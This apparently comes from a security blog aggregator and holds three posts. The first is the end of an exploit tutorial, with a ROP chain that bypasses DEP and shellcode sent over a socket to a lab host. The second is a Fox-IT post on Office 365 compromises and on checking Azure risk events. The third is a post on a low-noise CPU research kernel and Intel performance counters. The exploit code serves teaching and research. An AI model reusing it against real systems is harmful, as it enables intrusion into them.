rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Now we need to return to where the VirutalProtect call is on the stack.
# ECX contains a value around the old stack pointer at this time (from the beginning). Put ECX into EAX
# and decrement EAX to get back to the function call- and then load EAX into ESP.
# Restoring the old stack pointer here.
rop2 += struct.pack ('<L', 0x77e4a5e6)   # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41ac863b)   # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41ac863b)  # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77d6fa6a)   # 0x77d6fa6a: xchg eax, esp ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

ECX is moved into EAX:

EAX is then decremented by four bytes, to equal where the call to VirtualProtect() occurs on the stack:

EAX is then exchanged with ESP (EAX and ESP swap spaces):

As you can see, ESP points to the function call- and the ret loads that function call into the instruction pointer to kick off execution!:

As you can see, our calc.exe payload has been executed- and DEP has been defeated (the PowerShell windows shows the DEP policy. Open the image in a new tab to view it better)!!!!!:

You could replace the calc.exe payload with something like a shell- sure! This was just a POC payload, and there is something about shellcoding by hand, too that I love! ROP is so manual and requires living off the land, so I wanted a shellcode that reflected that same philosophy.

Final Thoughts

Please email me if you have any further questions! I can try to answer them as best I can. As I continue to start getting into more and more modern day exploit mitigation bypasses, I hope I can document some more of my discoveries and advances in exploit development.

Peace, love, and positivity :-)

ROP is different everytime. There is no one way to do it. However, I did learn a lot from this article, and referenced it. Thank you, Peter! :) You are a beast!

Office 365: prone to security breaches?

By: Fox IT
11 September 2019 at 11:30

Author: Willem Zeeman

“Office 365 again?”. At the Forensics and Incident Response department of Fox-IT, this is heard often.  Office 365 breach investigations are common at our department.
You’ll find that this blog post actually doesn’t make a case for Office 365 being inherently insecure – rather, it discusses some of the predictability of Office 365 that adversaries might use and mistakes that organisations make. The final part of this blog describes a quick check for signs if you already are a victim of an Office 365 compromise. Extended details about securing and investigating your Office 365 environment will be covered in blogs to come.

Office 365 is predictable
A lot of adversaries seem to have a financial motivation for trying to breach an email environment. A typical adversary doesn’t want to waste too much time searching for the right way to access the email system, despite the fact that it is often enough to browse to an address like https://webmail.companyname.tld. But why would the adversary risk encountering a custom or extra-secure web page? Why would the adversary accept the uncertainty of having to deal with a certain email protocol in use by the particular organisation? Why guess the URL? It’s much easier to use the “Cloud approach”.

In this approach, an adversary first collects a list of valid credentials (email address and password), most frequently gathered with the help of a successful phishing campaign. When credentials have been captured, the adversary simply browses to https://office.com and tries them. If there’s no second type of authentication required, they are in. That’s it. The adversary is now in paradise, because after gaining access, they also know what to expect here. Not some fancy or out-dated email system, but an Office 365 environment just like all the others. There’s a good chance that the compromised account owns an Exchange Online mailbox too.

In predictable environments, like Office 365, it’s also much easier to automate your process of evil intentions. The adversary may create a script or use some tooling, complement it with the gathered list of credentials and sit back. Of course, an adversary may also target a specific on-premises system configuration, but seen from an opportunistic point of view, why would they? According to Microsoft, more than 180 million people are using their popular cloud-based solution. It’s far more effective to try another set of credentials and enter another predictable environment than it is to spend time in figuring out where information might be available, and how the environment is configured.

Office 365 is… secure?
Well, yes, Office 365 is a secure platform. The truth is that it has a lot more easy-to-deploy security capabilities than the most common on-premises solutions. The issue here is that organisations seem to not always realise what they could and should do to secure Office 365.

Best practices for securing your Office 365 environment will be covered in a later blog, but here’s a sneak preview: More than 90% of the Office 365 breaches investigated by Fox-IT would not have happened if the organisation would have had multi-factor authentication in place. No, implementation doesn’t need to be a hassle. Yes, it’s a free to use option. Other security measures like receiving automatic alerts on suspicious activity detected by built-in Office 365 processes are free as well, but often neglected.

Simple preventive solutions like these are not even commonly available in on-premises-situation environments. It almost seems that many companies assume that they can get perfect security right out of the box, rather than configuring the platform to their needs. This may be the reason for organisations to do not even bother configuring Office 365 in a more secure way. That’s a pity, especially when securing your environment is often just a few cloud-clicks away. Office 365 may not be less secure than an on-premises solution, but it might be more prone to being compromised though. Thanks to the lack of involved expertise, and thanks to adversaries who know how to take advantage of this. Microsoft already offers multi-factor authentication to reduce the impact of attacks like phishing. This is great news, because we know from experience that most of the compromises that we see could have been prevented if those companies had used MFA. However, compelling more organisations to adopt it remains an ongoing challenge, and how to drive increased adoption of MFA remains an open question.

A lot of organisations are already compromised. Are you?
At our department we often see that it may take months(!) for an organisation to realise that they have been compromised. In Office 365 breaches, the adversary is often detected due to an action that causes so much noise that it’s no longer possible for the adversary to hide. When the adversary thinks it’s no longer beneficial to persist, the next step is to try to get foothold into another organisation. In our investigations, we see that when this happens, the adversary has already tried reaching a financial goal. This financial goal is often achieved by successfully committing a payment related fraud in which they use an employee’s internal email account to mislead someone. Eventually, to advance into another organisation, a phishing email is sent by the adversary to a large part of the organisation’s address list. In the end, somebody will likely take the bait and leave their credentials on a malevolent and adversary-controlled website. If a victim does, the story starts over again, at the other organisation. For the adversary, it’s just a matter of repeating the steps.

The step to gain foothold in another organisation is also the moment that a lot of (phishing) email messages are flowing out of the organisation. Thanks to Office 365 intelligence, these are automatically blocked if the number of messages surpasses a given limit based on the user’s normal email behaviour. This is commonly the moment where the victim gets in touch with their system administrator, asking why they can’t send any email anymore. Ideally, the system administrator will quickly notice the email messages containing malicious content and report the incident to the security team.

For now, let’s assume you do not have the basic precautions set up, and you want to know if somebody is lurking in your Office 365 environment. You could hire experts to forensically scrutinize your environment, and that would be a correct answer. There actually is a relatively easy way to check if Microsoft’s security intelligence already detected some bad stuff. In this blog we will zoom in on one of these methods. Please keep in mind that a full discussion of these range of the available methods is beyond the scope of this blog post. This blog post describes the method that from our perspective gives quick insights in (afterwards) checking for signs of a breach. The not-so-obvious part of this step is that you will find the output in Microsoft Azure, rather than in Office 365. A big part of the Office 365 environment is actually based on Microsoft Azure, and so is its authentication. This is why it’s usually[1] possible to log in at the Azure portal and check for Risk events.

The steps:

  1. Go to https://portal.azure.com and sign-in with your Office 365 admin account[2]
  2. At the left pane, click Azure Active Directory
  3. Scroll down to the part that says Security and click Risk events
  4. If there are any risky events, these will be listed here. For example, impossible travels are one of the more interesting events to pay attention to. These may look like this:

This risk event type identifies two sign-ins from the same account, originating from geographically distant locations within a period in which the geographically distance cannot be covered. Other unusual sign-ins are also marked by machine learning algorithms. Impossible travel is usually a good indicator that an adversary was able to successfully sign in. However, false positives may occur when a user is traveling using a new device or using a VPN.

Apart from the impossible travel registrations, Azure also has a lot of other automated checks which might be listed in the Risk events section. If you have any doubts about these, or if a compromise seems likely: please get in contact with your security team as fast as possible. If your security team needs help in the investigation or mitigation, contact the FoxCERT team. FoxCERT is available 24/7 by phone on +31 (0)800 FOXCERT (+31 (0)800-3692378).

[1] Disregarding more complex federated setups, and assuming the licensing model permits.

[2] The risky sign-ins reports are available to users in the following roles: Security Administrator, Global Administrator, Security Reader. Source: https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/concept-risky-sign-ins

marketingfoxit

Sushi Roll: A CPU research kernel with minimal noise for cycle-by-cycle micro-architectural introspection

19 August 2019 at 07:11

Twitter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!

Summary

In this blog we’re going to go into details about a CPU research kernel I’ve developed: Sushi Roll. This kernel uses multiple creative techniques to measure undefined behavior on Intel micro-architectures. Sushi Roll is designed to have minimal noise such that tiny micro-architectural events can be measured, such as speculative execution and cache-coherency behavior. With creative use of performance counters we’re able to accurately plot micro-architectural activity on a graph with an x-axis in cycles.

We’ll go a lot more into detail about what everything in this graph means later in the blog, but here’s a simple example of just some of the data we can collect:

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Agenda

This is a relatively long blog and will be split into 4 major sections.

  • The gears that turn in your CPU: A high-level explanation of modern Intel micro-architectures
  • Sushi Roll: The design of the low-noise research kernel
  • Cycle-by-cycle micro-architectural introspection: A unique usage of performance counters to observe cycle-by-cycle micro-architectural behaviors
  • Results: Putting the pieces together and making graphs of cool micro-architectural behavior

Why?

In the past year I’ve spent a decent amount of time doing CPU vulnerability research. I’ve written proof-of-concept exploits for nearly every CPU vulnerability, from many attacker perspectives (user leaking kernel, user/kernel leaking hypervisor, guest leaking other guest, etc). These exploits allowed us to provide developers and researchers with real-world attacks to verify mitigations.

CPU research happens to be an overlap of my two primary research interests: vulnerability research and high-performance kernel development. I joined Microsoft in the early winter of 2017 and this lined up pretty closely with the public release of the Meltdown and Spectre CPU attacks. As I didn’t yet have much on my plate, the idea was floated that I could look into some of the CPU vulnerabilities. I got pretty lucky with this timing, as I ended up really enjoying the work and ended up sinking most of my free time into it.

My workflow for research often starts with writing some custom tools for measuring and analysis of a given target. Whether the target is a web browser, PDF parser, remote attack surface, or a CPU, I’ve often found that the best thing you can do is just make something new. Try out some new attack surface, write a targeted fuzzer for a specific feature, etc. Doing something new doesn’t have to be better or more difficult than something that was done before, as often there are completely unexplored surfaces out there. My specialty is introspection. I find unique ways to measure behaviors, which then fuels the idea pool for code auditing or fuzzer development.

This leads to an interesting situation in CPU research… it’s largely blind. Lots of the current CPU research is done based on writing snippets of code and reviewing the overall side-effects of it (via cache timing, performance counters, etc). These overall side-effects may also include noise from other processor activity, from the OS task switching processes, other cores changing the MESI-state of cache lines, etc. I happened to already have a low-noise no-shared-memory research kernel that I developed for vectorized emulation on Xeon Phis! This lead to a really good starting point for throwing in some performance counters and measuring CPU behaviors… and the results were a bit better than expected.

TL;DR: I enjoy writing tools to measure things, so I wrote a tool to measure undefined CPU behavior.


The gears that turn in your CPU

Feel free to skip this section entirely if you’re familiar with modern processor architecture

Your modern Intel CPU is a fairly complex beast when you care about every technical detail, but lets look at it from a higher level. Here’s what the micro-architecture (uArch) looks like in a modern Intel Skylake processor.

Skylake diagram Skylake uArch diagram, Diagram from WikiChip

There are 3 main components: The front end, which converts complex x86 instructions into groups of micro-operations. The execution engine, which executes the micro-operations. And the memory subsystem, which makes sure that the processor is able to get streams of instructions and data.


Front End

The front end covers almost everything related to figuring out which micro-operations (uops) need to be dispatched to the execution engine in order to accomplish a task. The execution engine on a modern Intel processor does not directly execute x86 instructions, rather these instructions are converted to these micro-operations which are fixed in size and specific to the processor micro-architecture.

Instruction fetch and cache

There’s a lot that happens prior to the actual execution of an instruction. First, the memory containing the instruction is read into the L1 instruction cache, ideally brought in from the L2 cache as to minimize delay. At this point the instruction is still a macro-op (a variable-length x86 instruction), which is quite a pain to work with. The processor still doesn’t know how large the instruction is, so during pre-decode the processor will do an initial length decode to determine the instruction boundaries.

At this point the instruction has been chopped up and is ready for the instruction queue!

Instruction Queue and Macro Fusion

Instructions that come in for execution might be quite simple, and could potentially be “fused” into a complex operation. This stage is not publicly documented, but we know that a very common fusion is combining compare instructions with conditional branches. This allows a common instruction pattern like:

cmp rax, 5
jne .offset

To be combined into a single macro-op with the same semantics. This complex fused operation now only takes up one slot in many parts of the CPU pipeline, rather than two, freeing up more resources to other operations.

Decode

Instruction decode is where the x86 macro-ops get converted into micro-ops. These micro-ops vary heavily by uArch, and allow Intel to regularly change fundamentals in their processors without affecting backwards compatibility with the x86 architecture. There’s a lot of magic that happens in the decoder, but mostly what matters is that the variable-length macro-ops get converted into the fixed-length micro-ops. There are multiple ways that this conversion happens. Instructions might directly convert to uops, and this is the common path for most x86 instructions. However, some instructions, or even processor conditions, may cause something called microcode to get executed.

Microcode

Some instructions in x86 trigger microcode to be used. Microcode is effectively a tiny collection of uops which will be executed on certain conditions. Think of this like a C/C++ macro, where you can have a one-liner for something that expands to much more. When an operation does something that requires microcode, the microcode ROM is accessed and the uops it specifies are placed into the pipeline. These are often complex operations, like switching operating modes, reading/writing internal CPU registers, etc. This microcode ROM also gives Intel an opportunity to make changes to instruction behaviors entirely with a microcode patch.

uop Cache

There’s also a uop cache which allows previously decoded instructions to skip the entire pre-decode and decode process. Like standard memory caching, this provides a huge speedup and dramatically reduces bottlenecks in the front-end.

Allocation Queue

The allocation queue is responsible for holding a bunch of uops which need to be executed. These are then fed to the execution engine when the execution engine has resources available to execute them.


Execution engine

The execution engine does exactly what you would expect: it executes things. But at this stage your processor starts moving your instructions around to speed things up.

Things start to get a bit complex at this point, click for details!

Renaming / Allocating / Retirement

Resources need to be allocated for certain operations. There are a lot more registers in the processor than the standard x86 registers. These registers are allocated out for temporary operations, and often mapped onto their corresponding x86 registers.

There are a lot of optimizations the CPU can do at this stage. It can eliminate register moves by aliasing registers (such that two x86 registers “point to” the same internal register). It can remove known zeroing instructions (like xor with self, or and with zero) from the pipeline, and just zero the registers directly. These optimizations are frequently improved each generation.

Finally, when instructions have completed successfully, they are retired. This retirement commits the internal micro-architectural state back out to the x86 architectural state. It’s also when memory operations become visible to other CPUs.

Re-ordering

uOP re-ordering is important to modern CPU performance. Future instructions which do not depend on the current instruction, could execute while waiting for the results of the current one.

For example:

mov rax, [rax]
add rbx, rcx

In this short example we see that we perform a 64-bit load from the address in rax and store it back into rax. Memory operations can be quite expensive, ranging from 4 cycles for a L1 cache hit, to 250 cycles and beyond for an off-processor memory access.

The processor is able to realize that the add rbx, rcx instruction does not need to “wait” for the result of the load, and can send off the add uop for execution while waiting for the load to complete.

This is where things can start to get weird. The processor starts to perform operations in a different order than what you told it to. The processor then holds the results and makes sure they “appear” to other cores in the correct order, as x86 is a strongly-ordered architecture. Other architectures like ARM are typically weakly-ordered, and it’s up to the developer to insert fences in the instruction stream to tell the processor the specific order operations need to complete in. This ordering is not an issue on a single core, but it may affect the way another core observes the memory transactions you perform.

For example:

Core 0 executes the following:

mov [shared_memory.pointer], rax ; Store the pointer in `rax` to shared memory
mov [shared_memory.owned],   0   ; Mark that we no longer own the shared memory

Core 1 executes the following:

.try_again:
    cmp [shared_memory.owned], 0 ; Check if someone owns this memory
    jne .try_again               ; Someone owns this memory, wait a bit longer

    mov rax, [shared_memory.pointer] ; Get the pointer
    mov rax, [rax]                   ; Read from the pointer

On x86 this is safe, as all aligned loads and stores are atomic, and are commit in a way that they appear in-order to all other processors. On something like ARM the owned value could be written to prior to pointer being written, allowing core 1 to use a stale/invalid pointer.

Execution Units

Finally we got to an easy part: the execution units. This is the silicon that is responsible for actually performing maths, loads, and stores. The core has multiple copies of this hardware logic for some of the common operations, which allows the same operation to be performed in parallel on separate data. For example, an add can be performed on 4 different execution units.

For things like loads, there are 2 load ports (port 2 and port 3), this allows 2 independent loads to be executed per cycle. Stores on the other hand, only have one port (port 4), and thus the core can only perform one store per cycle.


Memory subsystem

The memory subsystem on Intel is pretty complex, but we’re only going to go into the basics.

Caches

Caches are critical to modern CPU performance. RAM latency is so high (150-250 cycles) that a CPU is largely unusable without a cache. For example, if a modern x86 processor at 2.2 GHz had all caches disabled, it would never be able to execute more than ~15 million instructions per second. That’s as slow as an Intel 80486 from 1991.

When working on my first hypervisor I actually disabled all caching by mistake, and Windows took multiple hours to boot. It’s pretty incredible how important caches are.

For x86 there are typically 3 levels of cache: A level 1 cache, which is extremely fast, but small: 4 cycles latency. Followed by a level 2 cache, which is much larger, but still quite small: 14 cycles latency. Finally there’s the last-level-cache (LLC, typically the L3 cache), this is quite large, but has a higher latency: ~60 cycles.

The L1 and L2 caches are present in each core, however, the L3 cache is shared between multiple cores.

Translation Lookaside Buffers (TLBs)

In modern CPUs, applications almost never interface with physical memory directly. Rather they go through address translation to convert virtual addresses to physical addresses. This allows contiguous virtual memory regions to map to fragmented physical memory. Performing this translation requires 4 memory accesses (on 64-bit 4-level paging), and is quite expensive. Thus the CPU caches recently translated addresses such that it can skip this translation process during memory operations.

It is up to the OS to tell the CPU when to flush these TLBs via an invalidate page, invlpg instruction. If the OS doesn’t correctly invlpg memory when mappings change, it’s possible to use stale translation information.

Line fill buffers

While a load is pending, and not yet present in L1 cache, the data lives in a line fill buffer. The line fill buffers live between L2 cache and your L1 cache. When a memory access misses L1 cache, a line fill buffer entry is allocated, and once the load completes, the LFB is copied into the L1 cache and the LFB entry is discarded.

Store buffer

Store buffers are similar to line fill buffers. While waiting for resources to be available for a store to complete, it is placed into a store buffer. This allows for up to 56 stores (on Skylake) to be queued up, even if all other aspects of the memory subsystem are currently busy, or stores are not ready to be retired.

Further, loads which access memory will query the store buffers to potentially bypass the cache. If a read occurs on a recently stored location, the read could directly be filled from the store buffers. This is called store forwarding.

Load buffers

Similar to store buffers, load buffers are used for pending load uops. This sits between your execution units and L1 cache. This can hold up to 72 entries on Skylake.

CPU architecture summary and more info

That was a pretty high level introduction to many of the aspects of modern Intel CPU architecture. Every component of this diagram could have an entire blog written on it. Intel Manuals, WikiChip, Agner Fog’s CPU documentation, and many more, provide a more thorough documentation of Intel micro-architecture.


Sushi Roll

Sushi Roll is one of my favorite kernels! It wasn’t originally designed for CPU introspection, but it had some neat features which made it much more suitable for CPU research than my other kernels. We’ll talk a bit about why this kernel exists, and then talk about why it quickly became my go-to kernel for CPU research.

Kernel mascot: Squishble Sushi Roll

A primer on Knights Landing

Sushi Roll was originally designed for my Vectorized Emulation work. Vectorized emulation was designed for the Intel Xeon Phi (Knights Landing), which is a pretty strange architecture. Even though it’s fully-featured traditional x86, standard software will “just work” on it, it is quite slow per individual thread. First of all, the clock rates are ~1.3 GHz, so there alone it’s about 2-3x slower than a “standard” x86 processor. Even further, it has fewer CPU resources for re-ordering and instruction decode. All-in-all the CPU is about 10x slower when running a single-threaded application compared to a “standard” 3 GHz modern Intel CPU. There’s also no L3 cache, so memory accesses can become much more expensive.

On top of these simple performance issues, there are more complex issues due to 4-way hyperthreading. Knights Landing was designed to be 4-way hyperthreaded (4 threads per core) to alleviate some of the performance losses of the limited instruction decode and caching. This allows threads to “block” on memory accesses while other threads with pending computations use the execution units. This 4-way hyperthreading, combined with 64-core processors, leads to 256 hardware threads showing up to your OS as cores.

Migrating processes and resources between these threads can be catastrophically slow. Standard shared-memory models also start to fall apart at this level of scaling (without specialized tuning). For example: If all 256 threads are hammering the same memory by performing an atomic increment (lock inc instruction), each individual increment will start to cost over 10,000 cycles! This is enough time for a single core on the Xeon Phi to do 640,000 single-precision floating point operations… just from a single increment! While most software treats atomics as “free locks”, they start to cause some serious cache-coherency pollution when scaled out this wide.

Obviously with some careful development you can mitigate these issues by decreasing the frequency of shared memory accesses. But perhaps we can develop a kernel that fundamentally disallows this behavior, preventing a developer from ever starting to go down the wrong path!

The original intent of Sushi Roll

Sushi Roll was designed from the start to be a massively parallel message-passing based kernel. The most notable feature of Sushi Roll is that there is no mutable shared memory allowed (a tiny exception made for the core IPC mechanism). This means that if you ever want to share information with another processor, you must pass that information via IPC. Shared immutable memory however, is allowed, as this doesn’t cause cache coherency traffic.

This design also meant that a lock never needed to be held, even atomic-level locks using the lock prefix. Rather than using locks, a specific core would own a hardware resource. For example, core #0 may own the network card, or a specific queue on the network card. Instead of requesting exclusive access to the NIC by obtaining a lock, you would send a message to core #0, indicating that you want to send a packet. All of the processing of these packets is done by the sender, thus the data is already formatted in a way that can be directly dropped into the NIC ring buffers. This made the owner of a hardware resource simply a mediator, reducing the latency to that resource.

While this makes the internals of the kernel a bit more complex, the programming model that a developer sees is still a standard send()/recv() model. By forcing message-passing, this ensured that all software written for this kernel could be scaled between multiple machines with no modification. On a single computer there is a fast, low-latency IPC mechanism that leverages some of the abilities to share memory (by transferring ownership of physical memory to the receiver). If the target for a message resided on another computer on the network, then the message would be serialized in a way that could be sent over the network. This complexity is yet again hidden from the developer, which allows for one program to be made that is scaled out without any extra effort.

No interrupts, no timers, no software threads, no processes

Sushi Roll follows a similar model to most of my other kernels. It has no interrupts, no timers, no software threads, and no processes. These are typically required for traditional operating systems, as to provide a user experience with multiple processes and users. However, my kernels are always designed for one purpose. This means the kernel boots up, and just does a given task on all cores (sometimes with one or two cores having a “special” responsibility).

By removing all of these external events, the CPU behaves a lot more deterministically. Sushi Roll goes the extra mile here, as it further reduces CPU noise by not having cores sharing memory and causing unexpected cache evictions or coherency traffic.

Soft Reboots

Similar to kexec on Linux, my kernels always support soft rebooting. This allows the old kernel (even a double faulted/corrupted kernel) to be replaced by a new kernel. This process takes about 200-300ms to tear down the old kernel, download the new one over PXE, and run the new one. This makes it feasible to have such a specialized kernel without processes, since I can just change the code of the kernel and boot up the new one in under a second. Rapid prototyping is crucial to fast development, and without this feature this kernel would be unusable.

Sushi Roll conclusion

Sushi Roll ended up being the perfect kernel for CPU introspection. It’s the lowest noise kernel I’ve ever developed, and it happened to also be my flagship kernel right as Spectre and Meltdown came out. By not having processes, threads, or interrupts, the CPU behaves much more deterministically than in a traditional OS.


Performance Counters

Before we get into how we got cycle-by-cycle micro-architectural data, we must learn a little bit about the performance monitoring available on Intel CPUs! This information can be explored in depth in the Intel System Developer Manual Volume 3b (note that the combined volume 3 manual doesn’t go into as much detail as the specific sub-volume manual).

Performance Counter Manual

Intel CPUs have a performance monitoring subsystem relying largely on a set of model-specific-registers (MSRs). These MSRs can be configured to track certain architectural events, typically by counting them. These counters are formally “performance monitoring counters”, often referred to as “performance counters” or PMCs.

These PMCs vary by micro-architecture. However, over time Intel has committed to offering a small subset of counters between multiple micro-architectures. These are called architectural performance counters. The version of these architectural performance counters are found in CPUID.0AH:EAX[7:0]. As of this writing there are 4 versions of architectural performance monitoring. The latest version provides a decent amount of generic information useful to general-purpose optimization. However, for a specific micro-architecture, the possibilities of performance events to track are almost limitless.

Basic usage of performance counters

To use the performance counters on Intel there are a few steps involved. First you must find a performance event you want to monitor. This information is found in per-micro-architecture tables found in the Intel Manual Volume 3b “Performance-Monitoring Events” chapter.

For example, here’s a very small selection of Skylake-specific performance events:

Skylake Events

Intel performance counters largely rely on two banks of MSRs. The performance event selection MSRs, where the different events are programmed using the umask and event numbers from the table above. And the performance counter MSRs which hold the counts themselves.

The performance event selection MSRs (IA32_PERFEVTSELx) start at address 0x186 and span a contiguous MSR region. The layout of these event selection MSRs varies slightly by micro-architecture. The number of counters available varies by CPU and is dynamically checked by reading CPUID.0AH:EAX[15:8]. The performance counter MSRs (IA32_PMCx) start at address 0xc1 and also span a contiguous MSR region. The counters have an micro-architecture-specific number of bits they support, found in CPUID.0AH:EAX[23:16]. Reading and writing these MSRs is done via the rdmsr and wrmsr instructions respectively.

Typically modern Intel processors support 4 PMCs, and thus will have 4 event selection MSRs (0x186, 0x187, 0x188, and 0x189) and 4 counter MSRs (0xc1, 0xc2, 0xc3, and 0xc4). Most processors have 48-bit performance counters. It’s important to dynamically detect this information!

Here’s what the IA32_PERFEVTSELx MSR looks like for PMC version 3:

Performance Event Selection

Field Meaning
Event Select Holds the event number from the event tables, for the event you are interested in
Unit Mask Holds the umask value from the event tables, for the event you are interested in
USR If set, this counter counts during user-land code execution (ring level != 0)
OS If set, this counter counts during OS execution (ring level == 0)
E If set, enables edge detection of the event being tracked. Counts de-asserted to asserted transitions, which allows for timing of events
PC Pin control allows for some hardware monitoring of events, like… the actual pins on the CPU
INT Generate an interrupt through the APIC if an overflow occurs of the (usually 48-bit) counter
ANY Increment the performance event when any hardware thread on a given physical core triggers the event, otherwise it only increments for a single logical thread
EN Enable the counter
INV Invert the counter mask, which changes the meaning of the CMASK field from a >= comparison (if this bit is 0), to a < comparison (if this bit is 1)
CMASK If non-zero, the CPU only increments the performance counter when the event is triggered >= (or < if INV is set) CMASK times in a single cycle. This is useful for filtering events to more specific situations. If zero, this has no effect and the counter is incremented for each event

And that’s about it! Find the right event you want to track in your specific micro-architecture’s table, program it in one of the IA32_PERFEVTSELx registers with the correct event number and umask, set the USR and/or OS bits depending on what type of code you want to track, and set the E bit to enable it! Now the corresponding IA32_PMCx counter will be incrementing every time that event occurs!

Reading the PMC counts faster

Instead of performing a rdmsr instruction to read the IA32_PMCx values, instead a rdpmc instruction can be used. This instruction is optimized to be a little bit faster and supports a “fast read mode” if ecx[31] is set to 1. This is typically how you’d read the performance counters.

Performance Counters version 2

In the second version of performance counters, Intel added a bunch of new features.

Intel added some fixed performance counters (IA32_FIXED_CTR0 through IA32_FIXED_CTR2, starting at address 0x309) which are not programmable. These are configured by IA32_FIXED_CTR_CTRL at address 0x38d. Unlike normal PMCs, these cannot be programmed to count any event. Rather the controls for these only allows the selection of which CPU ring level they increment at (or none to disable it), and whether or not they trigger an interrupt on overflow. No other control is provided for these.

Fixed Performance Counter MSR Meaning
IA32_FIXED_CTR0 0x309 Counts number of retired instructions
IA32_FIXED_CTR1 0x30a Counts number of core cycles while the processor is not halted
IA32_FIXED_CTR2 0x30b Counts number of timestamp counts (TSC) while the processor is not halted

These are then enabled and disabled by:

Fixed Counter Control

The second version of performance counters also added 3 new MSRs that allow “bulk management” of performance counters. Rather than checking the status and enabling/disabling each performance counter individually, Intel added 3 global control MSRs. These are IA32_PERF_GLOBAL_CTRL (address 0x38f) which allows enabling and disabling performance counters in bulk. IA32_PERF_GLOBAL_STATUS (address 0x38e) which allows checking the overflow status of all performance counters in one rdmsr. And IA32_PERF_GLOBAL_OVF_CTRL (address 0x390) which allows for resetting the overflow status of all performance counters in one wrmsr. Since rdmsr and wrmsr are serializing instructions, these can be quite expensive and being able to reduce the amount of them is important!

Global control (simple, allows masking of individual counters from one MSR):

Performance Global Control

Status (tracks overflows of various counters, with a global condition changed tracker):

Performance Global Status

Status control (writing a 1 to any of these bits clears the corresponding bit in IA32_PERF_GLOBAL_STATUS):

Performance Global Status

Finally, Intel added 2 bits to the existing IA32_DEBUGCTL MSR (address 0x1d9). These 2 bits Freeze_LBR_On_PMI (bit 11) and Freeze_PerfMon_On_PMI (bit 12) allow freezing of last branch recording (LBR) and performance monitoring on performance monitor interrupts (often due to overflows). These are designed to reduce the measurement of the interrupt itself when an overflow condition occurs.

Performance Counters version 3

Performance counters version 3 was pretty simple. Intel added the ANY bit to IA32_PERFEVTSELx and IA32_FIXED_CTR_CTRL to allow tracking of performance events on any thread on a physical core. Further, the performance counters went from a fixed number of 2 counters, to a variable amount of counters. This resulted in more bits being added to the global status, overflow, and overflow control MSRs, to control the corresponding counters.

Performance Global Status

Performance Counters version 4

Performance counters version 4 is pretty complex in detail, but ultimately it’s fairly simple. Intel renamed some of the MSRs (for example IA32_PERF_GLOBAL_OVF_CTRL became IA32_PERF_GLOBAL_STATUS_RESET). Intel also added a new MSR IA32_PERF_GLOBAL_STATUS_SET (address 0x391) which instead of clearing the bits in IA32_PERF_GLOBAL_STATUS, allows for setting of the bits.

Further, the freezing behavior enabled by IA32_DEBUGCTL.Freeze_LBR_On_PMI and IA32_DEBUGCTL.Freeze_PerfMon_On_PMI was streamlined to have a single bit which tracks the “freeze” state of the PMCs, rather than clearing the corresponding bits in the IA32_PERF_GLOBAL_CTRL MSR. This change is awesome as it reduces the cost of freezing and unfreezing the performance monitoring unit (PMU), but it’s actually a breaking change from previous versions of performance counters.

Finally, they added a mechanism to allow sharing of performance counters between multiple users. This is not really relevant to anything we’re going to talk about, so we won’t go into details.

Conclusion

Performance counters started off pretty simple, but Intel added more and more features over time. However, these “new” features are critical to what we’re about to do next :)


Cycle-by-cycle micro-architectural sampling

Now that we’ve gotten some prerequisites out of the way, lets talk about the main course of this blog: A creative use of performance counters to get cycle-by-cycle micro-architectural information out of Intel CPUs!

It’s important to note that this technique is meant to assist in finding and learning things about CPUs. The data it generates is not particularly easy to interpret or work with, and there are many pitfalls to be aware of!

The Goal

Performance counters are incredibly useful in categorizing micro-architectural behavior on an Intel CPU. However, these counters are often used on a block or whole program entirely, and viewed as a single data point over the whole run. For example, one might use performance counters to track the number of times there’s a cache miss in their program under test. This will give a single number as an output, giving an indication of how many times the cache was missed, but it doesn’t help much in telling you when they occurred. By some binary searching (or creative use of counter overflows) you can get a general idea of when the event occurred, but I wanted more information.

More specifically, I wanted to view micro-architectural data on a graph, where the x-axis was in cycles. This would allow me to see (with cycle-level granularity) when certain events happened in the CPU.

The Idea

We’ve set a pretty lofty goal for ourselves. We effectively want to link two performance counters with each other. In this case we want to use an arbitrary performance counter for some event we’re interested in, and we want to link it to a performance counter tracking the number of cycles elapsed. However, there doesn’t seem to be a direct way to perform this linking.

We know that we can have multiple performance counters, so we can configure one to count a given event, and another to count cycles. However, in this case we’re not able to capture information at each cycle, as we have no way of reading these counters together. We also cannot stop the counters ourselves, as stopping the counters requires injecting a wrmsr instruction which cannot be done on an arbitrary cycle boundary, and definitely cannot be done during speculation.

